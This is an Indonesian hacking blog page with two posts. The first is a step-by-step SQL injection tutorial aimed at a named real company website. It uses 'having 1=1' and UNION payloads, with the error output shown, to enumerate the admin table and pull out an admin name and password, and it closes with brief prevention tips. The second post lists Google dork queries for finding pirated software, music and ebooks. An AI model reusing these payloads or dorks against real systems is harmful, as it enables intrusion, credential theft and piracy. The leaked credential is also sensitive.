Pages

Bobol Web dengan Step-by-Step SQL Injection

-'Ken Arok'- | Kamis, 07 Oktober 2010 | Label: ,

Hingga Maret 2006, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan iko (iko94@yahoo.com)
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.
Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang biarkan aja): ‘ having 1=1–
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.NOMOR’ is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
‘ group by T_ADMIN.NOMOR having 1=1–
Akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.NIP’ is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1–
Akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.PASSWORD’ is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1–
(catatan : kalimat harus 1 baris, tidak dipotong)
——————–
- NIP atau Password atau Unit Anda salah !! -
——————–
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :
‘ union select sum(NOMOR) from T_ADMIN–
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
——————–
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :
‘ union select sum(NIP) from T_ADMIN–
Akan keluar pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
——————–
Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
‘ union select sum(nama_kolom) from T_ADMIN–
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
‘ union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > ‘a’–
artinya kita memilih minimum nama user yang lebih besar dari ‘a’
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value ‘bill ‘ to
a column of data type int.
/sipm/admin/dologin.asp, line 7
——————–
Anda lihat :
varchar value ‘bill ‘
‘bill’ itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :
‘ union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = ‘bill’–
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
———————
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value ‘m@mpusk@u’ to a
column of data type int.
/sipm/admin/dologin.asp, line 7
———————
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba :(
Atau kita pakai jalan pintas saja….
Kita inject-kan :
‘ union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA =’bill’–
catatan : harus satu baris.
Duarrrrrr……….
Glhodhak………….
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119′ having 1=1–
akan keluar pesan error :
—————————
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘tb_news.NewsId’ is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
—————————
artinya ‘tb_news.NewsId’ itulah nama tabel dan kolom kita
yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah “Startup and run SQL Server” menggunakan low privilege user
di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan…..
Hal itu adalah gambaran, betapa tidak amannya dunia internet…
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding :) )
Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
Special greets :
[+] www.neoteker.or.id
[+] www.bosen.net
[+] ftp_geo
[+] Schizoprenic (XNuxer Research Center) –> BEBASKAN DIA !!!
Sumber :
http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7
0 komentar

Trik Dasar Melakukan Google Hacking Untuk Mendapatkan File Apapun Secara Gratis Paman Google

-'Ken Arok'- | | Label: , ,

Paman Google
Sepintas di dunia internet, banyak sekali kegiatan hacking lewat google untuk mendapatkan file tersembunyi. FIle - file tersebut seharusnya dirahasiakan dan tidak boleh disebarkan. Tetapi, melalui google hacking itu semua dengan mudah kita ambil. Memang Google satu satunya search engine top sejagad raya ! Disini, saya hanya akan membantu anda dengan cara - cara dasar untuk hacking google supaya mendapatkan file apapun secara gratis. Tidak cara yang susah susah, karena berbahaya bagi kanker, janin, kelamin, kehamilan dan lainnya. Nah, file apa saja yang bisa kamu dapatkan? contohnya adalah file video, music, ebook, film, dokumen, arsip zip dan masih banyak lainnya. INgat..ingat,,,hanya trik dasar saja ya ! Kalo mau yang profesional bisa dikembangkan sendiri atau berguru padaku. Baca selanjutnya…
Berikut cara caranya :
Googling E-Book.
+(”index of”) +(”/ebooks”|”/book”) +(chm|pdf|zip|rar) +apache
Adalah Query yang menghasilkan Index ebook di server yang berbasis
Apache
allinurl: +(rar|chm|zip|pdf|tgz|lit) judul buku
Ganti “judul buku” dengan buku yang ingin dicari. Jika ingin mencari
“Wiro Sableng”, ganti “judul buku” dengan Wiro Sableng. Cara ini
digunakan jika benar-benar mengetahui judul buku yang dicari.
Googling Warez.
“parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” applications -xxx -html -htm -php -shtml -opendivx
-md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
Ganti Kata yang tebal dengan query.
Contoh, jika ingin mencari Limewire maka ganti “applications” dengan
Limewire. jika ingin mencari lagu dari Deep Purple berjudul Child In
Time, ganti “MP3? dengan Child in Time atau jika ingin mencari
lagu-lagu
Deep Purple tinggal ganti “MP3? dengan Deep Purple.
Googling MP3
?intitle:index.of? mp3
Cara lain untuk mencari MP3 di google adalah menggunakan Query ini.
Setelah MP3 kasih apa yang pengen dicari.
Contoh: Jika ingin mencari Led Zeppelin maka query-nya akan seperti ini
?intitle:index.of? mp3 led zeppelin
Googling file di megaupload
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:megaupload.com
Untuk mencari File musik ketik :
mp3|ogg|wma site:megaupload.com
Untuk mencari archive dan program ketik :
zip|rar|exe site:megaupload.com
Untuk mencari ebooks ketik :
pdf|rar|zip|doc|lit site:megaupload.com
Googling file di rapidshare.de
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:rapidshare.de
Untuk mencari File musik ketik :
mp3|ogg|wma site:rapidshare.de
Untuk mencari archive dan program ketik :
zip|rar|exe site:rapidshare.de
Untuk mencari ebooks ketik :
pdf|doc|lit|rar|zip site:rapidshare.de
Untuk Googling di Megaupload dan rapidshare bisa langsung meletakkan apa
yang diinginkan di bagian pertama.
Contoh: Jika ingin mencari DA VINCI CODE ebook gunakan query ini
da vinci code pdf|doc|lit|rar|zip site:rapidshare.de
(ini jika kita benar-benar tahu judul bukunya.
DAN UNTUK GOOGLE HACKING LAINNYA :
1. Ketikkan URL atau kriteria pencarian setelah titik dua.
2. Jangan ada spasi antara perintah dan istilah.
//////////////////////////////////////////////////////////
”””””””””””””””””””””””””””””
Perintah ext: [Mencari file tipe tertentu.]
exp = “ext:doc”
”””””””””””””””””””””””””””””
Perintah related: [Menampilkan website dengan tema serupa.]
exp = “related:yahoo.com”
”””””””””””””””””””””””””””””
Perintah site: [Menampilkan sub-site.]
exp = “site:yahoo.com”
”””””””””””””””””””””””””””””
Perintah allinurl: [Menampilkan semua URL.]
exp = “allinurl:yahoo”
”””””””””””””””””””””””””””””
Perintah allintitle: [Menampilkan semua istilah baris judul.]
exp = “allintitle:yahoo.com”
”””””””””””””””””””””””””””””
Perintah define: [Menjelaskan istilah.]
exp = “define:virus”
”””””””””””””””””””””””””””””
Perintah link: [Menampilkan popularitas website.]
exp = “link:namahomepage”
”””””””””””””””””””””””””””””
Perintah filetype:torrent [Menampilkan file tipe tertentu.]
exp = “batman filetype:torrent”
”””””””””””””””””””””””””””””
Perintah movie: [Menampilkan info film.]
exp = “movie:batman”
”””””””””””””””””””””””””””””
Perintah daterange: [Menampilkan website yang baru diindeks.]
exp = “daterange:(2006-01-01)(2006-02-02)”
”””””””””””””””””””””””””””””
//////////////////////////////////////////////////////////
0 komentar
Langganan: Postingan (Atom)